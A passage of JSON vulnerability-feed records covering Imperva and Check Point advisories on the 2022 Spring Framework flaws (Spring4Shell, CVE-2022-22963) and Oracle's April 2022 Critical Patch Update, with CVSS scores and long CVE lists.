for older vulnerabilities, including CVE-2010-1871, CVE-2018-1260, and CVE-2015-1427 that protect against CVE-2022-22963 and CVE-2022-22965\n\nImperva is also in the process of pushing more specific rules that will have a clear name associated with CVE-2022-22963 and CVE-2022-22965.\n\nThe post [Imperva Protects from New Spring Framework Zero-Day Vulnerabilities](<https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:20:03", "type": "impervablog", "title": "Imperva Protects from New Spring Framework Zero-Day Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2015-1427", "CVE-2018-1260", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T15:20:03", "id": "IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B", "href": "https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_security": [{"lastseen": "2022-05-21T00:38:13", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22946>), [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>), and [CVE-2022-22950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T21:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T21:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2022-05-05T23:28:11", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", "CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", "CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", "CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-05-04T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}